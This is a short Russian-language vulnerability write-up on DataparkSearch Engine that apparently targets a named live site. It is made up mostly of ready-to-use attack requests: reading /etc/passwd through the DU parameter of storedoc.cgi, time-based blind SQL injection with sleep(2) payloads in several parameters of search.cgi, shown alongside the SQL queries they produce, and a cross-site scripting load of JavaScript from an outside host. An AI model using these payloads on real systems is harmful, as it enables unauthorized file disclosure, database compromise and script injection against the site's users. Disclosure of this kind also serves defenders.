DataparkSearch Engine, SQL injection, XSS, Cross Site Scripting, File Include

DataparkSearch
DataPark Search Engine

Все SQL-inject запросы надо кодировать в Urlencode ALL, иначе экранируются.

В фаиле storedoc.cgi

Чтение фаилов: /etc/passwd


в GET параметре DU чтение фаила file:///etc/passwd
/kurgan/cache?CS=UTF-8&CT=text/html&DM=Sat,%2017%20Mar%202012,%2006:59:51%20YEKT&DS=48515&DU=file%3a%2f%2f%2fetc%2fpasswd&L=tr&label=&q=1&rec_id=1332401146


/kurgan/cache?DU=file:///etc/passwd
/kurgan/cache?DU=file%3a%2f%2f%2fetc%2fpasswd



Blind SQL Injection

В фаиле search.cgi
URL encoded GET в параметре cmd
/kurgan/s?cmd=%25D0%259D%25D0%25B0%25D0%25B9%25D1%2582%25D0%25B8%27%3dsleep%282%29%3d%27&GroupBySite=yes&np=0&q=1&s=DRP&syn=1


Выполняемый запрос:
INSERT INTO qinfo (q_id,name,value) VALUES (82971,'cmd','%D0%9D%D0%B0%D0%B9%D1%82%D0%B8'=sleep(2)='')


URL encoded GET в параметре GroupBySite
/kurgan/s?cmd=%D0%9D%D0%B0%D0%B9%D1%82%D0%B8&GroupBySite=yes%27%3dsleep%282%29%3d%27&np=0&q=1&s=DRP&syn=1


Выполняемый запрос:
INSERT INTO qinfo (q_id,name,value) VALUES (82972,'GroupBySite','yes'=sleep(2)='')


URL encoded GET в параметре np
/kurgan/s?cmd=%D0%9D%D0%B0%D0%B9%D1%82%D0%B8&GroupBySite=yes&np=0%27%3dsleep%282%29%3d%27&q=1&s=RPD&syn=1


Выполняемый запрос:
INSERT INTO qinfo (q_id,name,value) VALUES (82974,'np','0'=sleep(2)='')


URL encoded GET в параметре s
/kurgan/s?cmd=%D0%9D%D0%B0%D0%B9%D1%82%D0%B8&GroupBySite=yes&np=0&q=1&s=DRP%27%3dsleep%282%29%3d%27&syn=1


Выполняемый запрос:
INSERT INTO qinfo (q_id,name,value) VALUES (82976,'s','DRP'=sleep(2)='')


URL encoded GET в параметре site was set to 2126886643' and sleep(2)='
/kurgan/s?GroupBySite=yes&np=0&q=1&site=2126886643%27%20and%20sleep%282%29%3d%27&syn=1


Выполняемый запрос:
INSERT INTO qinfo (q_id,name,value) VALUES (82980,'site','2126886643' and sleep(2)='')


Cross Site Scripting

В фаиле storedoc.cgi

Загрузка произвольного фаила для отображения или выполнения JavaScript кода
http://kurganland.ru/kurgan/cache?CS=UTF-8&CT=text/html&DM=Sat,%2017%20Mar%202012,%2006:59:51%20YEKT&DS=48515&DU=http://himic.ru/xss.html&L=tr&label=&q=1&rec_id=1332401146


Выполнение:
http://kurganland.ru/kurgan/cache?DU=http://himic.ru/xss.html




Выполнение:
http://kurganland.ru/kurgan/cache?DU=http://himic.ru/


Нет комментариев